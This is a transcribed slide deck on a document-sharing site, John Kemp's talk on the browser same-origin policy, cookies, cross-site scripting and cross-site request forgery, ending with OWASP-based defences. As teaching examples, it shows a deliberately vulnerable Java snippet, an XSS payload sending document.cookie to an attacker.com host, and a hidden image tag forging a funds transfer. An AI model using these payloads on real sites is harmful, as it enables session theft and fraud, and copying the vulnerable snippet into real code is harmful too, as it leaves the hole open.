Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Web Design

Origins, Cookies and Security * Oh My!

advertisement 
Origins, Cookies and Security –
Oh My!
John Kemp, Nokia Mobile Solutions
What is the “Same-Origin Policy”?
• That a document or script loaded from one Web origin
may not manipulate properties of, or communicate
with, a document loaded from another Web origin.
• Server-side security enforced by a client (Web
browser!)
• Scheme, host and port are considered a unique origin
• Doesn’t restrict a document from having HTML
elements which call items from other origins (<img…>,
<script src…>)
• Everyone wants to break it (see <script src>, JSONP,
CORS)
Why same-origin policy?
• Netscape 2.0 implemented cookies
• HTTP Authentication
• Cookies created a session state mechanism for
HTTP
• HTTP authentication created a login session
state for HTTP
• One site can cause this state to be sent to
another site
Problems with same-origin policy
• Impersonation of a legitimate user (via cookie,
HTTP credentials)
• Impersonation of a legitimate site (by Referer
HTTP header, for example)
Leading to...
• Cross-site scripting
• Cross-site request forgery
• …and generally bad things for the user, victim site
Cross-site scripting
• Web app code:
(String) page += "⟨input name='creditcard' type='TEXT‘ value='" +
request.getParameter("CC") + "'⟩”;
• Attacker changes “CC” value to:
'⟩⟨script⟩document.location= 'http://www.attacker.com/cgibin/cookie.cgi?foo='+document.cookie⟨/script⟩'.
• All your session are belong to us!!!
Cross-site Request Forgery
• Victim site has a public state-changing URL:
http://example.com/app/transferFunds?amount=1500&destinationAccount
=4673243243
• Attacker makes a call to that URL inside an
innocuous image load:
⟨img
src="http://example.com/app/transferFunds?amount=1500&destinationAc
count=attackersAcct#“ width="0" height="0" /⟩
• All yr money are belong to us!!!
Some solutions
• Never, ever trust a client!
• Don’t rely solely on cookies or the Referer HTTP
header for authentication (for example, use CSRF
tokens)
• Validate input supplied by the requesting
user/site
• Encode input supplied by a requesting user/site
• Don’t write your own code (use OWASP ESAPI
where possible!)
More attacks, more information
• SOP - http://taossa.com/index.php/2007/02/08/same-origin-policy/
• CORS, UMP, XHR - http://www.w3.org/2001/tag/2010/06/01-crossdomain.html
• OWASP – http://www.owasp.org
• OWASP Top 10 - http://www.owasp.org/index.php/Top_10_2010-Main
• OWASP ESAPI - http://owasp-esapi-java.googlecode.com
Related documents
Dangerous Wi-Fi Access Point: Attacks to Benign Smartphone
Dangerous Wi-Fi Access Point: Attacks to Benign Smartphone
Common Web Vulnerabilities
Common Web Vulnerabilities
IUTGetRoot
IUTGetRoot
2-Application Security & Secure Software Development
2-Application Security & Secure Software Development
Application Security 101
Application Security 101
Laboratory work 2 SEC
Laboratory work 2 SEC
OWASP Web Vulnerabilities and Auditing
OWASP Web Vulnerabilities and Auditing
Training_Instructor_Agreement
Training_Instructor_Agreement
What is an OWASP? Open Web Application Security Project 
What is an OWASP? Open Web Application Security Project 
Presentation Tagline - OWASP AppSec USA 2011
Presentation Tagline - OWASP AppSec USA 2011
Security Policies - Personal Web Pages
Security Policies - Personal Web Pages
Workshop 3 Web Application Security - comp
Workshop 3 Web Application Security - comp
Media: An_introduction_to_penetration_testing
Media: An_introduction_to_penetration_testing
Presentation Title
Presentation Title
OWASP Plan - Strawman - OWASP AppSec USA 2011
OWASP Plan - Strawman - OWASP AppSec USA 2011
Hands on Demonstration for Testing Security in Web Applications
Hands on Demonstration for Testing Security in Web Applications
WebSecurity_Commonsecuritythreats_and_hacking
WebSecurity_Commonsecuritythreats_and_hacking
The Secure SDLC Panel Real answers from real experience
The Secure SDLC Panel Real answers from real experience
OWASP Live CD / WebGoat Live Demo
OWASP Live CD / WebGoat Live Demo
Project 2
Project 2
John-Reynders-Web-Security-Testing
John-Reynders-Web-Security-Testing
CyberSecology Reporting Template
CyberSecology Reporting Template
Download
advertisement